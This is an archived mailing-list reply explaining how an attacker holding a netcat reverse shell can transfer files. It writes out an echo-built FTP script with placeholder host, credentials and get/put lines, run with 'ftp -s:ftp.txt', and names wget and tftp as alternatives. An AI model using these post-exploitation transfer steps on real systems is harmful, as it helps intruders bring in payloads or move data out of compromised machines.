RE: Netcat reverse shell and ftp

["Glafkos Charalambous" <glafkos () infosec org uk>]

Hello,

The answer is that it can be done in many ways and everything depends on the
attackers imagination.

He can use netcat to create a reverse shell connection but from there he is
not limited at all to use ftp transfer for the files or any other possible
way to accomplish his task. 

Is there a specific reason you are asking only for ftp transfer? 

If yes let assume the following:

The attacker can direct connect to his attacking machine and transfer files
through netcat listening on his ftp instead of opening a command prompt. 

Secondly he can do the transfer with netcat itself

He can even use echo from command prompt to create his ftp transfer file
because as u might know ftp through netcat command prompt is non
interactive.

There are plenty of ways to do so..

Example of ftp transfer file:
echo open ipaddress > ftp.txt
echo username >> ftp.txt
echo password >> ftp.txt
echo bin >> ftp.txt 
echo (m)get/(m)put file >> ftp.txt
echo bye >> ftp.txt

Execute:
ftp -s:ftp.txt

There are plenty of tools that might be used to transfer files and not
limited to (ftp, wget, tftp).

Everything depends on the system and how hardened and secured it is.

There are many IT Solutions available at www.itsolutionskb.com if you are
interested to have a look. It's 3 months old but growing everyday larger..

Kindly Regards
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community 
www.astalavista.com 
www.astalavista.net


 

__________ Information from ESET Smart Security, version of virus signature
database 3800 (20090126) __________

The message was checked by ESET Smart Security.

http://www.eset.com